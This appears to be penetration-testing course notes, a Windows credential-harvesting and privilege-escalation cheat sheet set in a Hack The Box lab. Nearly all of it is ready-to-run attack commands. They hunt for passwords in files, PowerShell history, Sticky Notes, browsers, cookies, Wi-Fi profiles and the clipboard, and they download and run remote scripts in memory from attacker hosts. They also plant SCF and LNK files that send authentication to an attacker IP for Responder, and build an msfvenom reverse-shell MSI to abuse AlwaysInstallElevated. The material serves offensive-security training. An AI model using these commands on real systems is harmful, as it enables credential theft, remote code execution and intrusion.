https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#search-for-a-file-with-a-certain-filename
Application Configuration Files
Copy # Clear Text Passwords
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml
# Chrome Files
gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' | Select-String password
# Unattend.xml
# PS History
(Get-PSReadLineOption).HistorySavePath
gc (Get-PSReadLineOption).HistorySavePath
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue} Search File Contents for String
Copy # Example 1
findstr /SI /M "password" *.xml *.ini *.txt
# Example 2
findstr /si password *.xml *.ini *.txt *.config
# Example 3
findstr /spin "password" *.* Search File Content (PowerShell)
Copy select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password Search For File Extension
Copy # Example 1
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
# Example 2
where /R C:\ *.config Search For File Extension (PowerShell)
Copy Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore StickyNotes (PowerShell)
https://github.com/RamblingCookieMonster/PSSQLite
Copy # Import Module
Import-Module .\PSSQLite.psd1
# Find DB
ls C:\Users\<user>\AppData\Local\Packages
# Set Veriable
$db = 'C:\Users\htb-student\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite'
Invoke-SqliteQuery -Database $db -Query "SELECT Text FROM Note" | ft -wrap Cmdkey Saved Credentials
Browser Credentials
https://github.com/GhostPack/SharpDPAPI
Copy .\SharpChrome.exe logins /unprotect Mail Credentials
https://github.com/dafthack/MailSniper
Lazagne Tool
https://github.com/AlessandroZ/LaZagne
SessioniGopher
https://github.com/Arvanaghi/SessionGopher
Copy # Import Module
Import-Module .\SessionGopher.ps1
# Run Tool
Invoke-SessionGopher -Target WINLPE-SRV01 WIFI Passwords
Copy # View Saved Credentials
netsh wlan show profile
# Retrieve Saved Wireless Password
netsh wlan show profile ilfreight_corp key=clear Network Capture
Copy # Host this ps1 Script
while($true)
{
$process = Get-WmiObject Win32_Process | Select-Object CommandLine
Start-Sleep 1
$process2 = Get-WmiObject Win32_Process | Select-Object CommandLine
Compare-Object -ReferenceObject $process -DifferenceObject $process2
}
# Run in Memory on the target
IEX (iwr 'http://10.10.10.205/procmon.ps1') SCF on a File Share
Copy # Save as @file.scf
[Shell]
Command=2
IconFile=\\10.10.14.3\share\legit.ico
[Taskbar]
Command=ToggleDesktop
# Start Responder
sudo responder -wrf -v -I tun0 Malicious Ink File
Copy
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "\\<attackerIP>\@pwn.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Pillaging
Installed Applications
Get Installed Programs
Copy $INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize Discover Configuration Files
Copy ls C:\Users\julio\AppData\Roaming\mRemoteNG Abusing Cookies
Copy Cookies From FireFox
Copy copy $env:APPDATA\Mozilla\Firefox\Profiles\*.default-release\cookies.sqlite . https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/cookieextractor.py
Copy python3 cookieextractor.py --dbpath "cookies.sqlite" --host slack --cookie d Copy Cookies from Chromium Based
https://github.com/djhohnstein/SharpChromium
Copy # Download & Run Script
IEX(New-Object Net.WebClient).DownloadString('tun0/Invoke-SharpChromium.ps1')
# Update Location
copy "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Network\Cookies" "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
# Run Tool
Invoke-SharpChromium -Command "cookies slack.com" Clipboard
https://github.com/inguardians/Invoke-Clipboard/blob/master/Invoke-Clipboard.ps1
Copy # Download
IEX(New-Object Net.WebClient).DownloadString('http://tun0/Invoke-Clipboard.ps1')
# Run
Invoke-ClipboardLogger Attacking Backup Servers
Check Backups
Copy restic.exe -r E:\restic2\ snapshots Restore Backup
Copy # Restore Backup by ID
restic.exe -r E:\restic2\ restore 9971e881 --target C:\Restore Other Techniques
Always Install Elevated
Verify Enabled
Copy reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer Generate Malicious MSI
Copy msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=4444 -f msi -o priv-esc.msi Execute MSI
Copy msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart Scheduled Tasks
Enumerating Scheduled Tasks
Copy Get-ScheduledTask | select TaskName,State Mount VHDS/VMDK
Mount VMDK (Linux)
Copy guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk Mount VHD/VHDX (Linux)
Copy guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1 Last updated 2 months ago